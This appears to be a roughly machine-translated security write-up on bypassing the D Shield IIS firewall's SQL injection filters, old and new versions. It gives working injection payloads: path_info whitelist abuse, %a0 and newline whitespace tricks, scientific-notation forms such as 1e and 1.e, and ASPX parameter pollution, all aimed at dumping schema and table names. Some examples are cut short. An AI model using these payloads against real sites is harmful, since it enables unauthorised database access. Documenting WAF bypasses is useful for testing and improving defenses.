Bypass D Shield _ Firewall (legacy and new version) SQL injection Defense (multi posture)

D Shield old version:

00 Preface

D Shield _iis Firewall, currently only support Win2003 server, the former saw the official blog said D Shield new version will be launched recently, I believe that the function will be more powerful, this side to share the previous SQL injection defense test situation. D-Shield _iis firewall injects defensive strategies, such as, primary defense Get/post/cookie, files allow whitelist settings.

Construct different test environments, iis+ (asp/aspx/php) + (mssql/mysql), see the strategy here, the main test ideas:

A, white list

B, bypassing union Select or select from detection

Php+iis+mysql

Build this window2003+iis+php+mysql, can spend a lot of time, testing process is quite smooth, first to a block:

Bypass Posture One: white list

The path_info problem in PHP, simply speaking, is

Http:/x.x.x.x/1.php?id=1 is equivalent to

Http://x.x.x.x/1.php/xxxxxxxxxxxxx?id=1

The white list to pick a random address added in the back, can successfully bypass,

Http://x.x.x.x/1.php/admin.php?id=1 Union Select 1,2,schema_name from INFORMATION_SCHEMA. Schemata

After testing, GET, POST, and cookie are all valid and fully bypass

Bypass Posture II: white space characters

The white space characters that can be exploited in MySQL are:%09,%0a,%0b,%0c,%0d,%20,%a0;

Test, basically for the MSSQL [0x01-0x20] have been processed, but in MySQL there is also a%a0 can be used, you can see%A0 and select Fit, unrecognized, thereby bypassing.

Http://x.x.x.x/1.php?id=1 Union%a0select, from admin

Bypass posture three: \ n Form

The main question to consider, how to bypass union Select and select from?

If the previous pose is an exploration of the position between Union and select, is it possible to consider testing in front of the union?

For this reason, in the position of the parameter and union, it is tested that \ n can bypass the union select detection, bypassing the detection of the select from in the same way.

Http://x.x.x.x/1.php?id=\nunion (select 1,schema_name,\nfrom information_schema.schemata)

Iis+asp/aspx+mssql

Build Iis+asp/aspx+mssql environment, the idea is consistent, but the language and database characteristics slightly different, continue to Zhang D Shield:

Bypass Posture One: white list

ASP: Unsupported, path not found, and D shield prohibits execution of scripts with illegal characters or special directories (/1.asp/x).

http://x.x.x.x/admin.php/. /1.asp?id=1 and 1=1 intercept/1.asp?b=admin.php&id=1 and 1=1 intercept, visible D shield will recognize the location of the file, not just detect the URL exists white list so simple ...

ASPX: Similar to PHP http://x.x.x.x/1.aspx/admin.php?id=1 Union select 1, ' 2 ', table_name from INFORMATION_SCHEMA. TABLES can be successfully bypass

Bypass Posture II: white space characters

The white space characters available to MSSQL are: 01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f, [0x01-0x20] All have been processed, think of MySQL%a0 the slip can be used?

Asp+mssql:%A0 not supported, abandoned ...

Aspx+mssql:%a0+%0a mates, can successfully bypass the detection of union select id=1 Union%a0%0aselect 1, ' 2 ', table_name%a0from INFORMATION_SCHEMA. TABLES

Bypass Posture III: 1e (scientific notation) Form

MSSQL is a strong type, this side of the bypass is limited, from the previous bit is a number type, so that the 1efrom bypass the select from. Only related to the database, language-independent, so ASP and ASPX, can bypass,id=1eunion select ' 1 ', Table_name,1efrom information_schema. TABLES

D Shield NEW:

00 Preface:

"D Shield _ Firewall" Designed for IIS, an active defense protection software, in an internal and external protection to prevent the site and server intrusion. The new version of D Shield _ Firewall, support system: win2003/win2008/win2012/win2016, the overall protection effect in IIS, or very force. This article through a SQL injection point, share a bypass D shield _ Firewall SQL injection defense idea.

01 Environment Construction:

Construct a aspx+mssql injection point:

String id = request.params["id"];

String sql = string. Format ("select * from admin where id={0}", id);

"D Shield _ Firewall" version: v2.0.6.70

02 Special MSSQL Features:

One, MSSQL characteristics

In MSSQL, the position between the parameter and the Union, there are several common ways to fill:

(1) White space characters MSSQL can take advantage of white space characters are:

01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10,11,12,13,14,15,16,17,18,19,1a,1b,1c,1d,1e,1f,20

(2) Comment symbol

MSSQL can also use annotation symbols/**/

(3) floating point number

SELECT * FROM admin where id=1.1union select 1, ' 2 ', db_name () from admin

(4) 1E0 in the form of:

SELECT * FROM admin where id=1e0union select 1, ' 2 ', db_name () from admin

Second, Bypass Fuzz

Testing with these conventional forms is not effective, and then for the constructed SQL injection point, the position between the fuzz parameter and the Union

Http://x.x.x.x/sql.aspx?id=1 "Fuzz position" union Select Null,null,system_user

Fuzz Result: The Union Select defense can be successfully bypassed with this special numerical form of 1.e.

Here, the Union Select, which forms part of the bypass, then considers how to bypass the defense rules of select from.

Split injection of the. aspx attribute

One, ASPX HPP features

What is the order in which the service side receives the parameter IDs, assuming that the Get/post/cookie also submits the parameter IDs?

Aspx+iis: The parameter ID is also submitted, and all parameters are received, separated by commas, such as:

Second, Bypass test

Using Aspx+iis to receive parameters at the same time is very special, you can use this feature to do things. Use this feature to split the select from, bypassing the D-Shield's SQL injection defense rules.

04 Summary:

Part Bypass 1.E This special numerical form is suitable for the MSSQL scene.

Limitations of complete bypass posture:

Using the request.params["id"] to get the parameters, three ways to pass the parameters: (1) Get (2) POST (3) The COOKIE gets to the parameter stitching up.

The use of the scene slightly limited, just as bypass share a way of thinking.

In addition, if the union SELECT from three keywords are placed in the Get/post/cookie position, through the characteristics of the ASPX, I believe this is a lot of WAF can not defend.

Bypass D Shield _ Firewall (legacy and new version) SQL injection Defense (multi posture)